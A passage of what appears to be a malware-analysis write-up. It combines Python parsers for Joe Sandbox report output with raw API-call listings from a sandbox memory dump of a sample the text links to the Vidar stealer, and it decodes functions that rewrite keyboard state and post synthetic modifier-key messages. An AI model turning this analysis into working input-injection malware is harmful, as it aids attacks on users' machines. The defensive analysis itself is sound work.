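            args = m.group("args").split(",") if m.group("args") else []
            cur.apis.append(ApiCall(m.group("name"), m.group("module"), args,
                                    int(m.group("ref"), 16), m.group("subfn")))
            continue
        if ":" not in line:      # section headers such as "APIs", "Similarity"
            continue
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "Associated":
            # strip the "Download File" link text the web page appends
            cur.dumps.append(value.removesuffix("Download File").strip())
            continue
        cur.meta[key] = value
        if key == "Instruction Fuzzy Hash":   # last field of every record
            records.append(cur)
            cur = FunctionRecord()
    if cur.apis or cur.meta:
        records.append(cur)
    return records


def find_calls(records: list[FunctionRecord], api_name: str) -> list[int]:
    """Every call-site address at which api_name is referenced, in address order."""
    return sorted(a.ref for r in records for a in r.apis if a.name == api_name)


def module_histogram(records: list[FunctionRecord]) -> Counter:
    """How many call sites reference each module (GDI32, USER32, ...)."""
    return Counter(a.module for r in records for a in r.apis)


# Constructed sample: three records copied from the report excerpt above,
# with the repeated "Associated" lines shortened.
SAMPLE = """\
APIs
• DeleteObject.GDI32(00000000), ref: 00B737B7
• GetDC.USER32(00000000), ref: 00B737BF
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B737CA
• ReleaseDC.USER32(00000000,00000000), ref: 00B737D6
• CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00B73812
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B73823
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00B76504,?,?,000000FF,00000000,?,000000FF,?), ref: 00B7385E
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B7387D
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
• Instruction Fuzzy Hash: 41319C72211214BFEB158F50CC8AFEB3BA9EF49751F044065FE0DAB291CAB59C81C7A0
Strings
Similarity
• API ID:
• String ID: NULL Pointer assignment$Not an Object type
• API String ID: 0-572801152
• Instruction Fuzzy Hash: 6FD1BF71A0060A9FDB20CFA8C885EAEB7F5FF48304F1481A9E915AB290D774ED95CB50
APIs
• GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00B21B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00B2194E
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00B21B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00B219D1
  • Part of subcall function 00B13B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B06A79,?,0000015D,?,?,?,?,00B085B0,000000FF,00000000,?,?), ref: 00B13BC5
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00B21B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00B21AF7
• __freea.LIBCMT ref: 00B21B22
• __freea.LIBCMT ref: 00B21B2E
Similarity
• API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
• String ID:
• API String ID: 2829977744-0
• Instruction Fuzzy Hash: 9391C671E002269EDB208F6CEC95AEE7BF5EF29710F140AA9E819E7140E735DD81C760
"""

if __name__ == "__main__":
    recs = parse_report(SAMPLE)
    for i, r in enumerate(recs):
        print(i, [a.name for a in r.apis], r.strings)
    print(module_histogram(recs))
    print([hex(a) for a in find_calls(recs, "MultiByteToWideChar")])
```

The call-site addresses come straight from the "ref" field, so the output of find_calls can be pasted into IDA or x64dbg as breakpoints in the dumped module; the "Part of subcall" entries keep their parent function address in subcall_of so they are not mistaken for direct references.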
APIs
• SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00B51C1B
• SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00B51C43
• SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00B51C67
• SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00B51C97
• SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00B51D1E
• SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00B51D83
• SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00B51DEF
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2550207440-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 99b186e59421953abd2594a122ebbf4c8be0f483b917df147ad4d861442e77c9
                                                                                                                                                                                                                                                                                    • Instruction ID: ea613b96a1b59f9ba6e8ff5489aadefcb328941138dc411cc3f1f6638196968f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99b186e59421953abd2594a122ebbf4c8be0f483b917df147ad4d861442e77c9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D591EF75A00219AFDB00DF9CC885BBEB7F4FF04712F1488E9E940AB291DB75A949CB50
APIs
• VariantInit.OLEAUT32(?), ref: 00B643C8
• CharUpperBuffW.USER32(?,?), ref: 00B644D7
• _wcslen.LIBCMT ref: 00B644E7
• VariantClear.OLEAUT32(?), ref: 00B6467C
  • Part of subcall function 00B5169E: VariantInit.OLEAUT32(00000000), ref: 00B516DE
  • Part of subcall function 00B5169E: VariantCopy.OLEAUT32(?,?), ref: 00B516E7
  • Part of subcall function 00B5169E: VariantClear.OLEAUT32(?), ref: 00B516F3
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
• String ID: AUTOIT.ERROR$Incorrect Parameter format
• API String ID: 4137639002-1221869570
• Opcode ID: 3b1457475a88f1f1ca21f352ef5709ccb8fef99945ea6c7698fb1029702e1875
• Instruction ID: b1ef0666e449b4f6e6da9739898a57604a15cc2adff90ad747f5abfe89395f59
• Opcode Fuzzy Hash: 3b1457475a88f1f1ca21f352ef5709ccb8fef99945ea6c7698fb1029702e1875
• Instruction Fuzzy Hash: A6919870A087419FC710EF28C58092AB7E5FF89714F1488ADF88A9B351DB35ED06CB92
APIs
  • Part of subcall function 00B408FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B40831,80070057,?,?,?,00B40C4E), ref: 00B4091B
  • Part of subcall function 00B408FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B40831,80070057,?,?), ref: 00B40936
  • Part of subcall function 00B408FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B40831,80070057,?,?), ref: 00B40944
  • Part of subcall function 00B408FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B40831,80070057,?), ref: 00B40954
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00B656AE
• _wcslen.LIBCMT ref: 00B657B6
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00B6582C
• CoTaskMemFree.OLE32(?), ref: 00B65837
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
• String ID: NULL Pointer assignment
• API String ID: 614568839-2785691316
• Opcode ID: ebcd6f2c16e301dc028ca2fe399c001514f9c6cb662a813d8df4d2ca682b1225
• Instruction ID: e57f5159ed6be2a3c5eed657663a9acecbdbd4b2230e17ade484ddddff595329
• Opcode Fuzzy Hash: ebcd6f2c16e301dc028ca2fe399c001514f9c6cb662a813d8df4d2ca682b1225
• Instruction Fuzzy Hash: EA910671D10259EFDF21DFA4DC80AEEBBB8BF08304F1045A9E915A7251EB749A54CF60
APIs
• GetMenu.USER32(?), ref: 00B72C1F
• GetMenuItemCount.USER32(00000000), ref: 00B72C51
• GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B72C79
• _wcslen.LIBCMT ref: 00B72CAF
• GetMenuItemID.USER32(?,?), ref: 00B72CE9
• GetSubMenu.USER32(?,?), ref: 00B72CF7
  • Part of subcall function 00B44393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B443AD
  • Part of subcall function 00B44393: GetCurrentThreadId.KERNEL32 ref: 00B443B4
  • Part of subcall function 00B44393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B42F00), ref: 00B443BB
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B72D7F
  • Part of subcall function 00B4F292: Sleep.KERNEL32 ref: 00B4F30A
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
• String ID:
• API String ID: 4196846111-0
• Opcode ID: 6ee2087a447c6c085ef2245258f3712d8d6d07f17d994ba30c6110ee5e8d804d
• Instruction ID: f2932d27845e64fbf841e95876e83991dd67c33d9920ef692cc78a9a5c40079e
• Opcode Fuzzy Hash: 6ee2087a447c6c085ef2245258f3712d8d6d07f17d994ba30c6110ee5e8d804d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59716375A00215AFCB15DF65C885AAEB7F5EF48310F14C4A9E82AEB351DB34EE41CB90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsWindow.USER32(00000000), ref: 00B78992
                                                                                                                                                                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00B7899E
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00B78A79
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00B78AAC
                                                                                                                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,00000000), ref: 00B78AE4
                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 00B78B06
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00B78B1E
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4072528602-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 03536d94709aedacc47461f0e996c6e6b3c07aa994d6ef88a392b346e07d77da
                                                                                                                                                                                                                                                                                    • Instruction ID: ec779779272a59fdf0564baafa750e862401882be4c5a3a271a52bec54d1d57c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 03536d94709aedacc47461f0e996c6e6b3c07aa994d6ef88a392b346e07d77da
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF71BF74684204AFDB219F54C888FBABBF5FF09340F14949AE96DA7361CB31AD81DB11
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00B4B8C0
                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00B4B8D5
                                                                                                                                                                                                                                                                                    • SetKeyboardState.USER32(?), ref: 00B4B936
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00B4B964
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00B4B983
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00B4B9C4
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B4B9E7
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e54abfd885b7c987d73abbbdaf23f81643026115aecafd095a1a82feeee2cb4e
                                                                                                                                                                                                                                                                                    • Instruction ID: 888837ebc92b1cdabe12b49967c06efbfbbfff860587d3a47f16cef64bdefea3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e54abfd885b7c987d73abbbdaf23f81643026115aecafd095a1a82feeee2cb4e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2951CFA06087D53EFB3642388845FBA7EE9DB06704F0884C9E2D9568D2C7D8EED4E751
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetParent.USER32(00000000), ref: 00B4B6E0
                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00B4B6F5
                                                                                                                                                                                                                                                                                    • SetKeyboardState.USER32(?), ref: 00B4B756
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00B4B782
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00B4B79F
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00B4B7DE
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00B4B7FF
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 8fa769d9ae8fd1e6f35de9b06fece3cc0a66a091dcd6de076765e9aa9bd69a72
                                                                                                                                                                                                                                                                                    • Instruction ID: cbc99188a8478670df0774d06d485729a143d6e1a118be332896c639d7659e8e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8fa769d9ae8fd1e6f35de9b06fece3cc0a66a091dcd6de076765e9aa9bd69a72
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB51DFA09086D53EFB3683248C55F7ABFE9DB46304F0884C9E2D94A8D2D394EE94F751
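The two functions listed above (refs 00B4B8C0 to 00B4B9E7 and 00B4B6E0 to 00B4B7FF) share one shape: GetParent, GetKeyboardState, SetKeyboardState, then four PostMessageW calls whose message and wParam values the report prints only as raw hex. Decoded with the documented Win32 constants, the first function posts 0x0101 (WM_KEYUP) and the second 0x0100 (WM_KEYDOWN), each for 0x10 (VK_SHIFT), 0x11 (VK_CONTROL), 0x12 (VK_MENU) and 0x5B (VK_LWIN), after rewriting the thread's keyboard state. The report does not say what the functions are for; a plausible reading is that they synthetically release or press every modifier key before driving a window with injected input, but that is an interpretation. The following script is an added example, not part of the Joe Sandbox report and not Vidar's code: it parses the report's "APIs" bullet format, decodes message and virtual-key constants, and flags any function that touches keyboard state and then posts key messages for all four modifiers. The sample lines are copied from the two listings above; the function names, the regular expression and the flagging rule are the example's own.

```python
import re

# Documented Win32 constants (from the Windows SDK headers, not from the report).
WM_KEYDOWN = 0x0100
WM_KEYUP = 0x0101
WM_NCLBUTTONDOWN = 0x00A1
EM_GETSEL = 0x00B0
HTCAPTION = 0x0002
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}
MSG_NAMES = {WM_KEYDOWN: "WM_KEYDOWN", WM_KEYUP: "WM_KEYUP",
             WM_NCLBUTTONDOWN: "WM_NCLBUTTONDOWN", EM_GETSEL: "EM_GETSEL"}

# Constructed sample input: the "APIs" lines of the two functions, as printed in the report.
SAMPLE_KEYDOWN = """\
• GetParent.USER32(00000000), ref: 00B4B6E0
• GetKeyboardState.USER32(?), ref: 00B4B6F5
• SetKeyboardState.USER32(?), ref: 00B4B756
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00B4B782
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00B4B79F
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00B4B7DE
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00B4B7FF
"""
SAMPLE_KEYUP = """\
• GetParent.USER32(?), ref: 00B4B8C0
• GetKeyboardState.USER32(?), ref: 00B4B8D5
• SetKeyboardState.USER32(?), ref: 00B4B936
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00B4B964
• PostMessageW.USER32(?,00000101,00000011,?), ref: 00B4B983
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00B4B9C4
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B4B9E7
"""

# One bullet per call: "• Api.MODULE(arg,arg,...), ref: ADDRESS". Unknown arguments are printed as "?".
LINE_RE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


def parse_api_lines(text):
    """Parse report API bullets into dicts; hex args become ints, '?' becomes None."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = []
        for a in m.group("args").split(","):
            a = a.strip()
            args.append(int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]+", a) else None)
        calls.append({"api": m.group("api"), "module": m.group("module"),
                      "args": args, "ref": int(m.group("ref"), 16)})
    return calls


def describe_message_call(call):
    """Decode the msg/wParam of a PostMessageW or SendMessageW call into symbolic names."""
    if call["api"] not in ("PostMessageW", "SendMessageW") or len(call["args"]) < 3:
        return None
    msg, wparam = call["args"][1], call["args"][2]
    if msg is None:
        return "?"
    name = MSG_NAMES.get(msg, "0x%04X" % msg)
    if msg in (WM_KEYDOWN, WM_KEYUP) and wparam is not None:
        return "%s %s" % (name, VK_NAMES.get(wparam, "vk=0x%02X" % wparam))
    if msg == WM_NCLBUTTONDOWN and wparam == HTCAPTION:
        return "WM_NCLBUTTONDOWN HTCAPTION (synthetic title-bar drag)"
    return name


def modifier_key_injection(calls):
    """Return the message name (WM_KEYDOWN or WM_KEYUP) if the function reads and rewrites
    keyboard state and then posts that key message for all four modifier keys, else None."""
    apis = {c["api"] for c in calls}
    if not {"GetKeyboardState", "SetKeyboardState"} <= apis:
        return None
    per_msg = {}
    for c in calls:
        if c["api"] == "PostMessageW" and len(c["args"]) >= 3 and c["args"][1] in (WM_KEYDOWN, WM_KEYUP):
            per_msg.setdefault(c["args"][1], set()).add(c["args"][2])
    for msg, vks in per_msg.items():
        if set(VK_NAMES) <= vks:
            return MSG_NAMES[msg]
    return None


if __name__ == "__main__":
    for label, text in (("00B4B6E0", SAMPLE_KEYDOWN), ("00B4B8C0", SAMPLE_KEYUP)):
        calls = parse_api_lines(text)
        print(label, "->", modifier_key_injection(calls))
        for c in calls:
            d = describe_message_call(c)
            if d:
                print("  %08X %s" % (c["ref"], d))
```

The same parser can be pointed at the other listings in this section; for instance the SendMessageW call at 00B78B1E decodes to WM_NCLBUTTONDOWN with HTCAPTION, which is the standard way to make a window drag as if its title bar were clicked. Message 0x041C (WM_USER + 0x1C) at 00B78A79 is control-specific and is left as raw hex, because its meaning depends on the window class the report does not identify.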
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00B15F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00B157E3
                                                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 00B1585E
                                                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 00B15879
                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00B1589F
                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,00B15F16,00000000,?,?,?,?,?,?,?,?,?,00B15F16,?), ref: 00B158BE
                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,00B15F16,00000000,?,?,?,?,?,?,?,?,?,00B15F16,?), ref: 00B158F7
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
APIs
• _ValidateLocalCookies.LIBCMT ref: 00B030BB
• ___except_validate_context_record.LIBVCRUNTIME ref: 00B030C3
• _ValidateLocalCookies.LIBCMT ref: 00B03151
• __IsNonwritableInCurrentImage.LIBCMT ref: 00B0317C
• _ValidateLocalCookies.LIBCMT ref: 00B031D1
Strings
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
APIs
  • Part of subcall function 00B63AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00B63AD7
  • Part of subcall function 00B63AAB: _wcslen.LIBCMT ref: 00B63AF8
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00B61B6F
• WSAGetLastError.WSOCK32 ref: 00B61B7E
• WSAGetLastError.WSOCK32 ref: 00B61C26
• closesocket.WSOCK32(00000000), ref: 00B61C56
Similarity
• API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
• String ID:
• API String ID: 2675159561-0
APIs
  • Part of subcall function 00B4E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B4D7CD,?), ref: 00B4E714
  • Part of subcall function 00B4E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B4D7CD,?), ref: 00B4E72D
• lstrcmpiW.KERNEL32(?,?), ref: 00B4D7F0
• MoveFileW.KERNEL32(?,?), ref: 00B4D82A
• _wcslen.LIBCMT ref: 00B4D8B0
• _wcslen.LIBCMT ref: 00B4D8C6
• SHFileOperationW.SHELL32(?), ref: 00B4D90C
Strings
Similarity
• API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
• String ID: \*.*
• API String ID: 3164238972-1173974218
APIs
• SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00B738B8
• GetWindowLongW.USER32(?,000000F0), ref: 00B738EB
• GetWindowLongW.USER32(?,000000F0), ref: 00B73920
• SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00B73952
• SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00B7397C
• GetWindowLongW.USER32(?,000000F0), ref: 00B7398D
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B739A7
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
